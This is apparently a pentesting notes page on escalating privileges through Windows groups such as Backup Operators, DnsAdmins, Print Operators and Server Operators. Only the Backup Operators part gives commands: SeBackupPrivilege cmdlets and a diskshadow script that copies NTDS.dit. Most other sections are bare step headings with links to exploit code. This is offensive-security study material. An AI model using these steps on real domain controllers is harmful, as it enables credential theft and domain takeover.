Windows Group Privileges

Backup Operators

Membership of this group grants its members the SeBackup and SeRestore privileges.

https://github.com/giuliano108/SeBackupPrivilege

1 Import DLLs

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

2 Enable SebackupPrivilege

# Enable
Set-SeBackupPrivilege

# Verufy
Get-SeBackupPrivilege

3 Copy File

copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt

Copy NTDS.dit

diskshadow.exe

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

Backup SAM + SYSTEM Hives

Extract NTDS

Event Log Reader

Check Membership Group

Searching Security Logs

DnsAdmins

1 Generating Malicious DLL

2 Load DLL

3 Restart Service

Print Operators

Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

https://raw.githubusercontent.com/3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cpp

1 Compile CPP File

2 Add Capcop.sys

3 Verify Privilege Enables

4 Run Exploit

https://github.com/tandasat/ExploitCapcom

Server Operators

Allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers.

1 Query Service

2 Service Permissions Check

https://learn.microsoft.com/en-us/sysinternals/downloads/psservice

3 Modify Service Binary Path

4 Start / Stop Service

5 Dump Hashes

PreviousWindows User PrivilegesNextManual Enumeration

Last updated